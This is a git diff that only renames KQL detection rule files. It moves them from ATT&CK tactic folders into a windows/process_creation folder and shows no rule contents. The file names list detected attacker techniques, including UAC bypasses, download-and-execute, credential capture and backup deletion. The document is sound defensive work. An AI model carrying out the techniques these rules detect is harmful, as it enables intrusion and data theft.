rename to KQL/rules/windows/process_creation/addinutil_exe_execution_from_uncommon_directory.kql
diff --git a/KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql b/KQL/rules/windows/process_creation/agentexecutor_powershell_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql
rename to KQL/rules/windows/process_creation/agentexecutor_powershell_execution.kql
diff --git a/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/all_backups_deleted_via_wbadmin_exe.kql
similarity index 100%
rename from KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql
rename to KQL/rules/windows/process_creation/all_backups_deleted_via_wbadmin_exe.kql
diff --git a/KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/windows/process_creation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql
rename to KQL/rules/windows/process_creation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql
diff --git a/KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql b/KQL/rules/windows/process_creation/always_install_elevated_msi_spawned_cmd_and_powershell.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql
rename to KQL/rules/windows/process_creation/always_install_elevated_msi_spawned_cmd_and_powershell.kql
diff --git a/KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql b/KQL/rules/windows/process_creation/always_install_elevated_windows_installer.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql
rename to KQL/rules/windows/process_creation/always_install_elevated_windows_installer.kql
diff --git a/KQL/rules/Execution/application_removed_via_wmic_exe.kql b/KQL/rules/windows/process_creation/application_removed_via_wmic_exe.kql
similarity index 100%
rename from KQL/rules/Execution/application_removed_via_wmic_exe.kql
rename to KQL/rules/windows/process_creation/application_removed_via_wmic_exe.kql
diff --git a/KQL/rules/Execution/application_terminated_via_wmic_exe.kql b/KQL/rules/windows/process_creation/application_terminated_via_wmic_exe.kql
similarity index 100%
rename from KQL/rules/Execution/application_terminated_via_wmic_exe.kql
rename to KQL/rules/windows/process_creation/application_terminated_via_wmic_exe.kql
diff --git a/KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql b/KQL/rules/windows/process_creation/arbitrary_binary_execution_using_gup_utility.kql
similarity index 100%
rename from KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql
rename to KQL/rules/windows/process_creation/arbitrary_binary_execution_using_gup_utility.kql
diff --git a/KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql b/KQL/rules/windows/process_creation/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql
rename to KQL/rules/windows/process_creation/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql
diff --git a/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_configsecuritypolicy_exe.kql
similarity index 100%
rename from KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql
rename to KQL/rules/windows/process_creation/arbitrary_file_download_via_configsecuritypolicy_exe.kql
diff --git a/KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql
similarity index 100%
rename from KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql
rename to KQL/rules/windows/process_creation/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql
diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_imewdbld_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql
rename to KQL/rules/windows/process_creation/arbitrary_file_download_via_imewdbld_exe.kql
diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_msedge_proxy_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql
rename to KQL/rules/windows/process_creation/arbitrary_file_download_via_msedge_proxy_exe.kql
diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_msohtmed_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql
rename to KQL/rules/windows/process_creation/arbitrary_file_download_via_msohtmed_exe.kql
diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_mspub_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql
rename to KQL/rules/windows/process_creation/arbitrary_file_download_via_mspub_exe.kql
diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_presentationhost_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql
rename to KQL/rules/windows/process_creation/arbitrary_file_download_via_presentationhost_exe.kql
diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql b/KQL/rules/windows/process_creation/arbitrary_file_download_via_squirrel_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql
rename to KQL/rules/windows/process_creation/arbitrary_file_download_via_squirrel_exe.kql
diff --git a/KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql b/KQL/rules/windows/process_creation/arbitrary_msi_download_via_devinit_exe.kql
similarity index 100%
rename from KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql
rename to KQL/rules/windows/process_creation/arbitrary_msi_download_via_devinit_exe.kql
diff --git a/KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql b/KQL/rules/windows/process_creation/arbitrary_shell_command_execution_via_settingcontent_ms.kql
similarity index 100%
rename from KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql
rename to KQL/rules/windows/process_creation/arbitrary_shell_command_execution_via_settingcontent_ms.kql
diff --git a/KQL/rules/Defense Evasion/aspnetcompiler_execution.kql b/KQL/rules/windows/process_creation/aspnetcompiler_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/aspnetcompiler_execution.kql
rename to KQL/rules/windows/process_creation/aspnetcompiler_execution.kql
diff --git a/KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql b/KQL/rules/windows/process_creation/assembly_loading_via_cl_loadassembly_ps1.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql
rename to KQL/rules/windows/process_creation/assembly_loading_via_cl_loadassembly_ps1.kql
diff --git a/KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql b/KQL/rules/windows/process_creation/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql
similarity index 100%
rename from KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql
rename to KQL/rules/windows/process_creation/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql
diff --git a/KQL/rules/Collection/audio_capture_via_powershell.kql b/KQL/rules/windows/process_creation/audio_capture_via_powershell.kql
similarity index 100%
rename from KQL/rules/Collection/audio_capture_via_powershell.kql
rename to KQL/rules/windows/process_creation/audio_capture_via_powershell.kql
diff --git a/KQL/rules/Collection/audio_capture_via_soundrecorder.kql b/KQL/rules/windows/process_creation/audio_capture_via_soundrecorder.kql
similarity index 100%
rename from KQL/rules/Collection/audio_capture_via_soundrecorder.kql
rename to KQL/rules/windows/process_creation/audio_capture_via_soundrecorder.kql
diff --git a/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql b/KQL/rules/windows/process_creation/audit_policy_tampering_via_auditpol.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql
rename to KQL/rules/windows/process_creation/audit_policy_tampering_via_auditpol.kql
diff --git a/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql b/KQL/rules/windows/process_creation/audit_policy_tampering_via_nt_resource_kit_auditpol.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql
rename to KQL/rules/windows/process_creation/audit_policy_tampering_via_nt_resource_kit_auditpol.kql
diff --git a/KQL/rules/Collection/automated_collection_command_prompt.kql b/KQL/rules/windows/process_creation/automated_collection_command_prompt.kql
similarity index 100%
rename from KQL/rules/Collection/automated_collection_command_prompt.kql
rename to KQL/rules/windows/process_creation/automated_collection_command_prompt.kql
diff --git a/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql b/KQL/rules/windows/process_creation/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql
rename to KQL/rules/windows/process_creation/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql
diff --git a/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql b/KQL/rules/windows/process_creation/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql
rename to KQL/rules/windows/process_creation/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql
diff --git a/KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql b/KQL/rules/windows/process_creation/base64_encoded_powershell_command_detected.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql
rename to KQL/rules/windows/process_creation/base64_encoded_powershell_command_detected.kql
diff --git a/KQL/rules/Execution/base64_mz_header_in_commandline.kql b/KQL/rules/windows/process_creation/base64_mz_header_in_commandline.kql
similarity index 100%
rename from KQL/rules/Execution/base64_mz_header_in_commandline.kql
rename to KQL/rules/windows/process_creation/base64_mz_header_in_commandline.kql
diff --git a/KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql b/KQL/rules/windows/process_creation/binary_proxy_execution_via_dotnet_trace_exe.kql
similarity index 100%
rename from KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql
rename to KQL/rules/windows/process_creation/binary_proxy_execution_via_dotnet_trace_exe.kql
diff --git a/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql b/KQL/rules/windows/process_creation/bitlockertogo_exe_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql
rename to KQL/rules/windows/process_creation/bitlockertogo_exe_execution.kql
diff --git a/KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql b/KQL/rules/windows/process_creation/boot_configuration_tampering_via_bcdedit_exe.kql
similarity index 100%
rename from KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql
rename to KQL/rules/windows/process_creation/boot_configuration_tampering_via_bcdedit_exe.kql
diff --git a/KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql b/KQL/rules/windows/process_creation/browser_execution_in_headless_mode.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql
rename to KQL/rules/windows/process_creation/browser_execution_in_headless_mode.kql
diff --git a/KQL/rules/Credential Access/browser_started_with_remote_debugging.kql b/KQL/rules/windows/process_creation/browser_started_with_remote_debugging.kql
similarity index 100%
rename from KQL/rules/Credential Access/browser_started_with_remote_debugging.kql
rename to KQL/rules/windows/process_creation/browser_started_with_remote_debugging.kql
diff --git a/KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql b/KQL/rules/windows/process_creation/bypass_uac_via_cmstp.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql
rename to KQL/rules/windows/process_creation/bypass_uac_via_cmstp.kql
diff --git a/KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql b/KQL/rules/windows/process_creation/bypass_uac_via_fodhelper_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql
rename to KQL/rules/windows/process_creation/bypass_uac_via_fodhelper_exe.kql
diff --git a/KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql b/KQL/rules/windows/process_creation/bypass_uac_via_wsreset_exe.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql
rename to KQL/rules/windows/process_creation/bypass_uac_via_wsreset_exe.kql
diff --git a/KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql b/KQL/rules/windows/process_creation/c_il_code_compilation_via_ilasm_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql
rename to KQL/rules/windows/process_creation/c_il_code_compilation_via_ilasm_exe.kql
diff --git a/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql b/KQL/rules/windows/process_creation/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql
similarity index 100%
rename from KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql
rename to KQL/rules/windows/process_creation/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql
diff --git a/KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql b/KQL/rules/windows/process_creation/capture_credentials_with_rpcping_exe.kql
similarity index 100%
rename from KQL/rules/Credential Access/capture_credentials_with_rpcping_exe.kql
rename to KQL/rules/windows/process_creation/capture_credentials_with_rpcping_exe.kql
diff --git a/KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql b/KQL/rules/windows/process_creation/certificate_exported_via_certutil_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql
rename to KQL/rules/windows/process_creation/certificate_exported_via_certutil_exe.kql
diff --git a/KQL/rules/Credential Access/certificate_exported_via_powershell.kql b/KQL/rules/windows/process_creation/certificate_exported_via_powershell.kql
similarity index 100%
rename from KQL/rules/Credential Access/certificate_exported_via_powershell.kql
rename to KQL/rules/windows/process_creation/certificate_exported_via_powershell.kql
diff --git a/KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql b/KQL/rules/windows/process_creation/change_default_file_association_to_executable_via_assoc.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql
rename to KQL/rules/windows/process_creation/change_default_file_association_to_executable_via_assoc.kql
diff --git a/KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql b/KQL/rules/windows/process_creation/change_default_file_association_via_assoc.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql
rename to KQL/rules/windows/process_creation/change_default_file_association_via_assoc.kql
diff --git a/KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql b/KQL/rules/windows/process_creation/change_powershell_policies_to_an_insecure_level.kql
similarity index 100%
rename from KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql
rename to KQL/rules/windows/process_creation/change_powershell_policies_to_an_insecure_level.kql
diff --git a/KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql b/KQL/rules/windows/process_creation/changing_existing_service_imagepath_value_via_reg_exe.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql
rename to KQL/rules/windows/process_creation/changing_existing_service_imagepath_value_via_reg_exe.kql
diff --git a/KQL/rules/Persistence/chopper_webshell_process_pattern.kql b/KQL/rules/windows/process_creation/chopper_webshell_process_pattern.kql
similarity index 100%
rename from KQL/rules/Persistence/chopper_webshell_process_pattern.kql
rename to KQL/rules/windows/process_creation/chopper_webshell_process_pattern.kql
diff --git a/KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql b/KQL/rules/windows/process_creation/chromium_browser_headless_execution_to_mockbin_like_site.kql
similarity index 100%
rename from KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql
rename to KQL/rules/windows/process_creation/chromium_browser_headless_execution_to_mockbin_like_site.kql
diff --git a/KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql b/KQL/rules/windows/process_creation/chromium_browser_instance_executed_with_custom_extension.kql
similarity index 100%
rename from KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql
rename to KQL/rules/windows/process_creation/chromium_browser_instance_executed_with_custom_extension.kql
diff --git a/KQL/rules/Command and Control/cloudflared_portable_execution.kql b/KQL/rules/windows/process_creation/cloudflared_portable_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/cloudflared_portable_execution.kql
rename to KQL/rules/windows/process_creation/cloudflared_portable_execution.kql
diff --git a/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql b/KQL/rules/windows/process_creation/cloudflared_quick_tunnel_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql
rename to KQL/rules/windows/process_creation/cloudflared_quick_tunnel_execution.kql
diff --git a/KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql b/KQL/rules/windows/process_creation/cloudflared_tunnel_connections_cleanup.kql
similarity index 100%
rename from KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql
rename to KQL/rules/windows/process_creation/cloudflared_tunnel_connections_cleanup.kql
diff --git a/KQL/rules/Command and Control/cloudflared_tunnel_execution.kql b/KQL/rules/windows/process_creation/cloudflared_tunnel_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/cloudflared_tunnel_execution.kql
rename to KQL/rules/windows/process_creation/cloudflared_tunnel_execution.kql
diff --git a/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql b/KQL/rules/windows/process_creation/cmd_exe_missing_space_characters_execution_anomaly.kql
similarity index 100%
rename from KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql
rename to KQL/rules/windows/process_creation/cmd_exe_missing_space_characters_execution_anomaly.kql
diff --git a/KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql b/KQL/rules/windows/process_creation/cmstp_execution_process_creation.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql
rename to KQL/rules/windows/process_creation/cmstp_execution_process_creation.kql
diff --git a/KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql b/KQL/rules/windows/process_creation/cmstp_uac_bypass_via_com_object_access.kql
similarity index 100%
rename from KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql
rename to KQL/rules/windows/process_creation/cmstp_uac_bypass_via_com_object_access.kql
diff --git a/KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql b/KQL/rules/windows/process_creation/cobaltstrike_load_by_rundll32.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql
rename to KQL/rules/windows/process_creation/cobaltstrike_load_by_rundll32.kql
diff --git a/KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql b/KQL/rules/windows/process_creation/code_execution_via_pcwutl_dll.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql
rename to KQL/rules/windows/process_creation/code_execution_via_pcwutl_dll.kql
diff --git a/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql b/KQL/rules/windows/process_creation/codepage_modification_via_mode_com_to_russian_language.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql
rename to KQL/rules/windows/process_creation/codepage_modification_via_mode_com_to_russian_language.kql
diff --git a/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql b/KQL/rules/windows/process_creation/com_object_execution_via_xwizard_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql
rename to KQL/rules/windows/process_creation/com_object_execution_via_xwizard_exe.kql
diff --git a/KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql b/KQL/rules/windows/process_creation/command_line_execution_with_suspicious_url_and_appdata_strings.kql
similarity index 100%
rename from KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql
rename to KQL/rules/windows/process_creation/command_line_execution_with_suspicious_url_and_appdata_strings.kql
diff --git a/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql b/KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql
similarity index 100%
rename from KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql
rename to KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql
diff --git a/KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql b/KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql
similarity index 100%
rename from KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql
rename to KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql
diff --git a/KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql b/KQL/rules/windows/process_creation/compressed_file_creation_via_tar_exe.kql
similarity index 100%
rename from KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql
rename to KQL/rules/windows/process_creation/compressed_file_creation_via_tar_exe.kql
diff --git a/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql b/KQL/rules/windows/process_creation/compressed_file_extraction_via_tar_exe.kql
similarity index 100%
rename from KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql
rename to KQL/rules/windows/process_creation/compressed_file_extraction_via_tar_exe.kql
diff --git a/KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql b/KQL/rules/windows/process_creation/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql
similarity index 100%
rename from KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql
rename to KQL/rules/windows/process_creation/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql
diff --git a/KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql b/KQL/rules/windows/process_creation/computer_password_change_via_ksetup_exe.kql
similarity index 100%
rename from KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql
rename to KQL/rules/windows/process_creation/computer_password_change_via_ksetup_exe.kql
diff --git a/KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/computer_system_reconnaissance_via_wmic_exe.kql
similarity index 100%
rename from KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql
rename to KQL/rules/windows/process_creation/computer_system_reconnaissance_via_wmic_exe.kql
diff --git a/KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql b/KQL/rules/windows/process_creation/conhost_exe_commandline_path_traversal.kql
similarity index 100%
rename from KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql
rename to KQL/rules/windows/process_creation/conhost_exe_commandline_path_traversal.kql
diff --git a/KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql b/KQL/rules/windows/process_creation/conhost_spawned_by_uncommon_parent_process.kql
similarity index 100%
rename from KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql
rename to KQL/rules/windows/process_creation/conhost_spawned_by_uncommon_parent_process.kql
diff --git a/KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql b/KQL/rules/windows/process_creation/console_codepage_lookup_via_chcp.kql
similarity index 100%
rename from KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql
rename to KQL/rules/windows/process_creation/console_codepage_lookup_via_chcp.kql
diff --git a/KQL/rules/Privilege Escalation/control_panel_items.kql b/KQL/rules/windows/process_creation/control_panel_items.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/control_panel_items.kql
rename to KQL/rules/windows/process_creation/control_panel_items.kql
diff --git a/KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql b/KQL/rules/windows/process_creation/convertto_securestring_cmdlet_usage_via_commandline.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql
rename to KQL/rules/windows/process_creation/convertto_securestring_cmdlet_usage_via_commandline.kql
diff --git a/KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql b/KQL/rules/windows/process_creation/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql
similarity index 100%
rename from KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql
rename to KQL/rules/windows/process_creation/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql
diff --git a/KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql b/KQL/rules/windows/process_creation/copy_from_or_to_admin_share_or_sysvol_folder.kql
similarity index 100%
rename from KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql
rename to KQL/rules/windows/process_creation/copy_from_or_to_admin_share_or_sysvol_folder.kql
diff --git a/KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql b/KQL/rules/windows/process_creation/copy_from_volumeshadowcopy_via_cmd_exe.kql
similarity index 100%
rename from KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql
rename to KQL/rules/windows/process_creation/copy_from_volumeshadowcopy_via_cmd_exe.kql
diff --git a/KQL/rules/Credential Access/copying_sensitive_files_with_credential_data.kql b/KQL/rules/windows/process_creation/copying_sensitive_files_with_credential_data.kql
similarity index 100%
rename from KQL/rules/Credential Access/copying_sensitive_files_with_credential_data.kql
rename to KQL/rules/windows/process_creation/copying_sensitive_files_with_credential_data.kql
diff --git a/KQL/rules/Defense Evasion/createdump_process_dump.kql b/KQL/rules/windows/process_creation/createdump_process_dump.kql similarity index 100% rename from KQL/rules/Defense Evasion/createdump_process_dump.kql rename to KQL/rules/windows/process_creation/createdump_process_dump.kql diff --git a/KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql b/KQL/rules/windows/process_creation/csc_exe_execution_form_potentially_suspicious_parent.kql similarity index 100% rename from KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql rename to KQL/rules/windows/process_creation/csc_exe_execution_form_potentially_suspicious_parent.kql diff --git a/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql b/KQL/rules/windows/process_creation/cscript_wscript_potentially_suspicious_child_process.kql similarity index 100% rename from KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql rename to KQL/rules/windows/process_creation/cscript_wscript_potentially_suspicious_child_process.kql diff --git a/KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql b/KQL/rules/windows/process_creation/cscript_wscript_uncommon_script_extension_execution.kql similarity index 100% rename from KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql rename to KQL/rules/windows/process_creation/cscript_wscript_uncommon_script_extension_execution.kql diff --git a/KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql b/KQL/rules/windows/process_creation/curl_download_and_execute_combination.kql similarity index 100% rename from KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql rename to KQL/rules/windows/process_creation/curl_download_and_execute_combination.kql 
diff --git a/KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql b/KQL/rules/windows/process_creation/curl_web_request_with_potential_custom_user_agent.kql similarity index 100% rename from KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql rename to KQL/rules/windows/process_creation/curl_web_request_with_potential_custom_user_agent.kql diff --git a/KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql b/KQL/rules/windows/process_creation/data_copied_to_clipboard_via_clip_exe.kql similarity index 100% rename from KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql rename to KQL/rules/windows/process_creation/data_copied_to_clipboard_via_clip_exe.kql diff --git a/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql b/KQL/rules/windows/process_creation/data_export_from_mssql_table_via_bcp_exe.kql similarity index 100% rename from KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql rename to KQL/rules/windows/process_creation/data_export_from_mssql_table_via_bcp_exe.kql diff --git a/KQL/rules/Impact/delete_all_scheduled_tasks.kql b/KQL/rules/windows/process_creation/delete_all_scheduled_tasks.kql similarity index 100% rename from KQL/rules/Impact/delete_all_scheduled_tasks.kql rename to KQL/rules/windows/process_creation/delete_all_scheduled_tasks.kql diff --git a/KQL/rules/Impact/delete_important_scheduled_task.kql b/KQL/rules/windows/process_creation/delete_important_scheduled_task.kql similarity index 100% rename from KQL/rules/Impact/delete_important_scheduled_task.kql rename to KQL/rules/windows/process_creation/delete_important_scheduled_task.kql 
